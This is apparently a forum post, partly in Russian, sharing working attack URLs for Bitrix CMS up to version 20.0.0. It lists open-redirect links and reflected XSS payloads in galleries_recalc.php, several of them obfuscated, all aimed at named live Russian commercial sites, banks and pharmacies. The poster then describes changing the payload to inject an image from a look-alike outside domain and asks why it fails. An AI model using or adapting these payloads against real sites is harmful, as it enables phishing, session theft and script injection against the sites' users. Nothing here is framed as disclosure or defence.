Open Redirect <= 20.0.0 Code: https://www.bitrix24.com/bitrix/redirect.php?goto=http://www.bitrix24.com%[email protected]/ https://shop.mts.ru/bitrix/redirect.php?goto=http://shop.mts.ru%[email protected]/ https://www.banki.ru/bitrix/redirect.php?goto=https://www.banki.ru%[email protected]/ https://www.securitylab.ru/bitrix/redirect.php?goto=http://www.securitylab.ru%[email protected]/ https://apteka.ru/bitrix/redirect.php?goto=http://apteka.ru%[email protected]/ https://www.radiorecord.ru/bitrix/redirect.php?goto=http://www.radiorecord.ru%[email protected]/ https://www.maxidom.ru/bitrix/redirect.php?goto=http://www.maxidom.ru%[email protected]/ https://fix-price.ru/bitrix/redirect.php?goto=http://fix-price.ru%[email protected]/ https://www.toy.ru/bitrix/redirect.php?goto=http://www.toy.ru%[email protected]/ и т.д.
Reflected XSS <= 20.0.0 Code: https://www.toy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){// https://www.banki.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){// https://shop.mts.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};top[%27a%27%2B%27lert%27](document.domain);if(1){//
в XSS вместо алерта вставляю Code: document.write("<img src='http://myapteka.tk/girl.jpg'>"); в DOM вставляется, но почему-то картинка не отображается
